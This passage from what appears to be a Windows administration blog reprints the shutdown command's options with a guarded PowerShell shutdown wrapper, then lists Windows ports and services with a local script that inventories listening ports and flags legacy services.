Search this blog for the autorun script post if you want this to launch automatically.

Full options for the shutdown command, as printed by shutdown /?:

    No args    Display help. This is the same as typing /?.
    /?         Display help. This is the same as not typing any options.
    /i         Display the graphical user interface (GUI).
               This must be the first option.
    /l         Log off. This cannot be used with /m or /d options.
    /s         Shutdown the computer.
    /r         Full shutdown and restart the computer.
    /g         Full shutdown and restart the computer. After the system is
               rebooted, restart any registered applications.
    /a         Abort a system shutdown.
               This can only be used during the time-out period.
    /p         Turn off the local computer with no time-out or warning.
               Can be used with /d and /f options.
    /h         Hibernate the local computer.
               Can be used with the /f option.
    /hybrid    Performs a shutdown of the computer and prepares it for fast startup.
               Must be used with /s option.
    /e         Document the reason for an unexpected shutdown of a computer.
    /o         Go to the advanced boot options menu and restart the computer.
               Must be used with /r option.
    /m \\computer Specify the target computer.
    /t xxx   Set the time-out period before shutdown to xxx seconds.
               The valid range is 0-315360000 (10 years), with a default of 30.
               If the timeout period is greater than 0, the /f parameter is
               implied.
    /c "comment" Comment on the reason for the restart or shutdown.
               Maximum of 512 characters allowed.
    /f         Force running applications to close without forewarning users.
               The /f parameter is implied when a value greater than 0 is
               specified for the /t parameter.
    /d [p|u:]xx:yy  Provide the reason for the restart or shutdown.
               p indicates that the restart or shutdown is planned.
               u indicates that the reason is user defined.
               If neither p nor u is specified the restart or shutdown is
               unplanned.
               xx is the major reason number (positive integer less than 256).
               yy is the minor reason number (positive integer less than 65536)
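
The switches above are easy to misuse once you move from a prank to real maintenance: the delay has to be inside the documented range, the comment is capped at 512 characters, any delay above 0 silently implies /f (open programs are killed), and /m only works if you hold administrative rights on the target. The PowerShell wrapper below is an added example and not code from the original post. It validates those limits before calling shutdown.exe, supports the same /a abort, and shows the command it is about to run when called with -WhatIf. The function name, the 120-second default and the planned reason code p:4:1 are choices made for this example.

```powershell
# Added example (not from the original post): a guarded wrapper around shutdown.exe.
# Function name, default delay and the reason code are choices made for this example.
function Invoke-PlannedShutdown {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory = $true)]
        [ValidateSet('Shutdown', 'Restart', 'Abort')]
        [string]$Action,

        # /t accepts 0-315360000 seconds; any value above 0 also implies /f.
        [ValidateRange(0, 315360000)]
        [int]$DelaySeconds = 120,

        # /c accepts at most 512 characters.
        [ValidateLength(0, 512)]
        [string]$Comment = 'Planned maintenance',

        # Optional remote target for /m. Needs administrative rights on that machine.
        [string]$ComputerName
    )

    # Typed as string[] so += keeps appending elements instead of concatenating text.
    [string[]]$shutdownArgs = switch ($Action) {
        'Shutdown' { '/s' }
        'Restart'  { '/r' }
        'Abort'    { '/a' }   # only succeeds while a countdown is still running
    }

    if ($ComputerName) {
        $shutdownArgs += @('/m', "\\$ComputerName")
    }

    if ($Action -ne 'Abort') {
        # /d p:4:1 marks the event as planned, major reason 4 / minor reason 1
        # ("Application: Maintenance (Planned)" in shutdown's own reason table),
        # so the System event log records a reason instead of "unplanned".
        $shutdownArgs += @('/t', "$DelaySeconds", '/d', 'p:4:1', '/c', $Comment)
    }

    $target = if ($ComputerName) { $ComputerName } else { $env:COMPUTERNAME }
    if ($PSCmdlet.ShouldProcess($target, "shutdown.exe $($shutdownArgs -join ' ')")) {
        & "$env:SystemRoot\System32\shutdown.exe" @shutdownArgs
        if ($LASTEXITCODE -ne 0) {
            throw "shutdown.exe exited with code $LASTEXITCODE"
        }
    }
}

# Preview the exact command line without running it:
Invoke-PlannedShutdown -Action Restart -DelaySeconds 60 -Comment 'Monthly patching' -WhatIf
# Cancel a running countdown on this machine:
# Invoke-PlannedShutdown -Action Abort
```

Drop -WhatIf to actually run it. Because a non-zero /t implies /f, keep the delay generous enough for users to save their work, and remember that the abort has to be issued against the same machine (add -ComputerName for a remote target) before the countdown reaches zero.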

Monday, May 27, 2013

Ports and Protocols

Sorted by port number:

Port    Protocol  Application protocol            System service name
------- --------- ------------------------------- ----------------------------------------
n/a     GRE       GRE (IP protocol 47)            Routing and Remote Access
n/a     ESP       IPSec ESP (IP protocol 50)      Routing and Remote Access
n/a     AH        IPSec AH (IP protocol 51)       Routing and Remote Access
7       TCP       Echo                            Simple TCP/IP Services
7       UDP       Echo                            Simple TCP/IP Services
9       TCP       Discard                         Simple TCP/IP Services
9       UDP       Discard                         Simple TCP/IP Services
13      TCP       Daytime                         Simple TCP/IP Services
13      UDP       Daytime                         Simple TCP/IP Services
17      TCP       Quotd                           Simple TCP/IP Services
17      UDP       Quotd                           Simple TCP/IP Services
19      TCP       Chargen                         Simple TCP/IP Services
19      UDP       Chargen                         Simple TCP/IP Services
20      TCP       FTP default data                FTP Publishing Service
21      TCP       FTP control                     FTP Publishing Service
21      TCP       FTP control                     Application Layer Gateway Service
23      TCP       Telnet                          Telnet
25      TCP       SMTP                            Simple Mail Transfer Protocol
25      UDP       SMTP                            Simple Mail Transfer Protocol
25      TCP       SMTP                            Exchange Server
25      UDP       SMTP                            Exchange Server
42      TCP       WINS Replication                Windows Internet Name Service
42      UDP       WINS Replication                Windows Internet Name Service
53      TCP       DNS                             DNS Server
53      UDP       DNS                             DNS Server
53      TCP       DNS                             Internet Connection Firewall/Internet Connection Sharing
67      UDP       DHCP Server                     DHCP Server
67      UDP       DHCP Server                     Internet Connection Firewall/Internet Connection Sharing
69      UDP       TFTP                            Trivial FTP Daemon Service
80      TCP       HTTP                            Windows Media Services
80      TCP       HTTP                            World Wide Web Publishing Service
80      TCP       HTTP                            SharePoint Portal Server
88      TCP       Kerberos                        Kerberos Key Distribution Center
88      UDP       Kerberos                        Kerberos Key Distribution Center
102     TCP       X.400                           Microsoft Exchange MTA Stacks
110     TCP       POP3                            Microsoft POP3 Service
110     TCP       POP3                            Exchange Server
119     TCP       NNTP                            Network News Transfer Protocol
123     UDP       NTP                             Windows Time
123     UDP       SNTP                            Windows Time
135     TCP       RPC                             Message Queuing
135     TCP       RPC                             Remote Procedure Call
135     TCP       RPC                             Exchange Server
135     TCP       RPC                             Certificate Services
135     TCP       RPC                             Cluster Service
135     TCP       RPC                             Distributed File System
135     TCP       RPC                             Distributed Link Tracking
135     TCP       RPC                             Distributed Transaction Coordinator
135     TCP       RPC                             Event Log
135     TCP       RPC                             Fax Service
135     TCP       RPC                             File Replication
135     TCP       RPC                             Local Security Authority
135     TCP       RPC                             Remote Storage Notification
135     TCP       RPC                             Remote Storage Server
135     TCP       RPC                             Systems Management Server 2.0
135     TCP       RPC                             Terminal Services Licensing
135     TCP       RPC                             Terminal Services Session Directory
137     UDP       NetBIOS Name Resolution         Computer Browser
137     UDP       NetBIOS Name Resolution         Server
137     UDP       NetBIOS Name Resolution         Windows Internet Name Service
137     UDP       NetBIOS Name Resolution         Net Logon
137     UDP       NetBIOS Name Resolution         Systems Management Server 2.0
138     UDP       NetBIOS Datagram Service        Computer Browser
138     UDP       NetBIOS Datagram Service        Messenger
138     UDP       NetBIOS Datagram Service        Server
138     UDP       NetBIOS Datagram Service        Net Logon
138     UDP       NetBIOS Datagram Service        Distributed File System
138     UDP       NetBIOS Datagram Service        Systems Management Server 2.0
138     UDP       NetBIOS Datagram Service        License Logging Service
139     TCP       NetBIOS Session Service         Computer Browser
139     TCP       NetBIOS Session Service         Fax Service
139     TCP       NetBIOS Session Service         Performance Logs and Alerts
139     TCP       NetBIOS Session Service         Print Spooler
139     TCP       NetBIOS Session Service         Server
139     TCP       NetBIOS Session Service         Net Logon
139     TCP       NetBIOS Session Service         Remote Procedure Call Locator
139     TCP       NetBIOS Session Service         Distributed File System
139     TCP       NetBIOS Session Service         Systems Management Server 2.0
139     TCP       NetBIOS Session Service         License Logging Service
143     TCP       IMAP                            Exchange Server
161     UDP       SNMP                            SNMP Service
162     UDP       SNMP Traps Outbound             SNMP Trap Service
389     TCP       LDAP Server                     Local Security Authority
389     UDP       LDAP Server                     Local Security Authority
389     TCP       LDAP Server                     Distributed File System
389     UDP       LDAP Server                     Distributed File System
443     TCP       HTTPS                           HTTP SSL
443     TCP       HTTPS                           World Wide Web Publishing Service
443     TCP       HTTPS                           SharePoint Portal Server
445     TCP       SMB                             Fax Service
445     TCP       SMB                             Print Spooler
445     TCP       SMB                             Server
445     TCP       SMB                             Remote Procedure Call Locator
445     TCP       SMB                             Distributed File System
445     TCP       SMB                             License Logging Service
445     TCP       SMB                             Net Logon
500     UDP       IPSec ISAKMP                    Local Security Authority
515     TCP       LPD                             TCP/IP Print Server
548     TCP       File Server for Macintosh       File Server for Macintosh
554     TCP       RTSP                            Windows Media Services
563     TCP       NNTP over SSL                   Network News Transfer Protocol
593     TCP       RPC over HTTP                   Remote Procedure Call
593     TCP       RPC over HTTP                   Exchange Server
636     TCP       LDAP SSL                        Local Security Authority
636     UDP       LDAP SSL                        Local Security Authority
993     TCP       IMAP over SSL                   Exchange Server
995     TCP       POP3 over SSL                   Exchange Server
1270    TCP       MOM-Encrypted                   Microsoft Operations Manager 2000
1433    TCP       SQL over TCP                    Microsoft SQL Server
1433    TCP       SQL over TCP                    MSSQL$UDDI
1434    UDP       SQL Probe                       Microsoft SQL Server
1434    UDP       SQL Probe                       MSSQL$UDDI
1645    UDP       Legacy RADIUS                   Internet Authentication Service
1646    UDP       Legacy RADIUS                   Internet Authentication Service
1701    UDP       L2TP                            Routing and Remote Access
1723    TCP       PPTP                            Routing and Remote Access
1755    TCP       MMS                             Windows Media Services
1755    UDP       MMS                             Windows Media Services
1801    TCP       MSMQ                            Message Queuing
1801    UDP       MSMQ                            Message Queuing
1812    UDP       RADIUS Authentication           Internet Authentication Service
1813    UDP       RADIUS Accounting               Internet Authentication Service
1900    UDP       SSDP                            SSDP Discovery Service
2101    TCP       MSMQ-DCs                        Message Queuing
2103    TCP       MSMQ-RPC                        Message Queuing
2105    TCP       MSMQ-RPC                        Message Queuing
2107    TCP       MSMQ-Mgmt                       Message Queuing
2393    TCP       OLAP Services 7.0               SQL Server: Downlevel OLAP Client Support
2394    TCP       OLAP Services 7.0               SQL Server: Downlevel OLAP Client Support
2460    UDP       MS Theater                      Windows Media Services
2535    UDP       MADCAP                          DHCP Server
2701    TCP       SMS Remote Control (control)    SMS Remote Control Agent
2701    UDP       SMS Remote Control (control)    SMS Remote Control Agent
2702    TCP       SMS Remote Control (data)       SMS Remote Control Agent
2702    UDP       SMS Remote Control (data)       SMS Remote Control Agent
2703    TCP       SMS Remote Chat                 SMS Remote Control Agent
2703    UDP       SMS Remote Chat                 SMS Remote Control Agent
2704    TCP       SMS Remote File Transfer        SMS Remote Control Agent
2704    UDP       SMS Remote File Transfer        SMS Remote Control Agent
2725    TCP       SQL Analysis Services           SQL Analysis Server
2869    TCP       UPNP                            UPNP Device Host
2869    TCP       SSDP event notification         SSDP Discovery Service
3268    TCP       Global Catalog Server           Local Security Authority
3269    TCP       Global Catalog Server           Local Security Authority
3343    UDP       Cluster Services                Cluster Service
3389    TCP       Terminal Services               NetMeeting Remote Desktop Sharing
3389    TCP       Terminal Services               Terminal Services
3527    UDP       MSMQ-Ping                       Message Queuing
4011    UDP       BINL                            Remote Installation
4500    UDP       NAT-T                           Local Security Authority
5000    TCP       SSDP legacy event notification  SSDP Discovery Service
5004    UDP       RTP                             Windows Media Services
5005    UDP       RTCP                            Windows Media Services
42424   TCP       ASP.Net Session State           ASP.NET State Service
51515   TCP       MOM-Clear                       Microsoft Operations Manager 2000
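
A table like this is most useful when you turn it around and ask a live host which of these ports are actually open, and which process or service owns each listener. The script below is an added example and not part of the original post. $KnownPorts is a hand-picked subset of the table above (extend it as needed), and $Flagged is this editor's own list of legacy or clear-text services that deserve a second look if they are found listening. It needs Windows 8 / Server 2012 or later for Get-NetTCPConnection and Get-NetUDPEndpoint, and an elevated prompt to resolve the owning process of every listener.

```powershell
# Added example (not part of the original post): inventory listening ports on this host
# and annotate them with the service names from the table above.
# $KnownPorts is a hand-picked subset of the table; $Flagged is this example's own list of
# legacy/clear-text services that deserve a second look if found listening.
# Requires Windows 8 / Server 2012 or later; run elevated to resolve every owning process.

$KnownPorts = @{
    '23/TCP'   = 'Telnet'
    '69/UDP'   = 'TFTP (Trivial FTP Daemon Service)'
    '80/TCP'   = 'HTTP (World Wide Web Publishing Service)'
    '135/TCP'  = 'RPC (Remote Procedure Call)'
    '137/UDP'  = 'NetBIOS Name Resolution'
    '138/UDP'  = 'NetBIOS Datagram Service'
    '139/TCP'  = 'NetBIOS Session Service'
    '389/TCP'  = 'LDAP Server (Local Security Authority)'
    '443/TCP'  = 'HTTPS (HTTP SSL)'
    '445/TCP'  = 'SMB (Server)'
    '636/TCP'  = 'LDAP SSL (Local Security Authority)'
    '1433/TCP' = 'SQL over TCP (Microsoft SQL Server)'
    '1434/UDP' = 'SQL Probe (Microsoft SQL Server)'
    '1900/UDP' = 'SSDP (SSDP Discovery Service)'
    '3389/TCP' = 'Terminal Services'
    '5000/TCP' = 'SSDP legacy event notification (SSDP Discovery Service)'
}
$Flagged = @('23/TCP', '69/UDP', '137/UDP', '138/UDP', '139/TCP', '1434/UDP', '1900/UDP', '5000/TCP')

function Get-ListenerInventory {
    # TCP listeners and UDP endpoints, normalised to one shape.
    $listeners = @(
        Get-NetTCPConnection -State Listen | ForEach-Object {
            [pscustomobject]@{ Port = $_.LocalPort; Protocol = 'TCP'; Address = $_.LocalAddress; ProcessId = $_.OwningProcess }
        }
        Get-NetUDPEndpoint | ForEach-Object {
            [pscustomobject]@{ Port = $_.LocalPort; Protocol = 'UDP'; Address = $_.LocalAddress; ProcessId = $_.OwningProcess }
        }
    )

    # PID -> service name(s), so a listener can be tied back to the "System service name" column.
    $servicesByPid = @{}
    Get-CimInstance -ClassName Win32_Service | Where-Object { $_.ProcessId -gt 0 } | ForEach-Object {
        $servicesByPid[[int]$_.ProcessId] += @($_.Name)
    }

    foreach ($l in $listeners) {
        $key  = '{0}/{1}' -f $l.Port, $l.Protocol
        $proc = Get-Process -Id $l.ProcessId -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Port      = $l.Port
            Protocol  = $l.Protocol
            Address   = $l.Address
            PID       = $l.ProcessId
            Process   = if ($proc) { $proc.ProcessName } else { 'n/a' }
            Services  = ($servicesByPid[[int]$l.ProcessId] -join ', ')
            KnownAs   = if ($KnownPorts.ContainsKey($key)) { $KnownPorts[$key] } else { 'not in table' }
            AllIfaces = $l.Address -in @('0.0.0.0', '::')   # bound to every interface, not just loopback
            Flag      = $key -in $Flagged
        }
    }
}

Get-ListenerInventory | Sort-Object -Property Flag, AllIfaces, Port -Descending | Format-Table -AutoSize
```

Rows with Flag set and AllIfaces true are the ones to chase first: a legacy service reachable on every interface. A listener whose Services column is empty is not hosted by a Windows service at all, so the Process column is the only clue to what opened it.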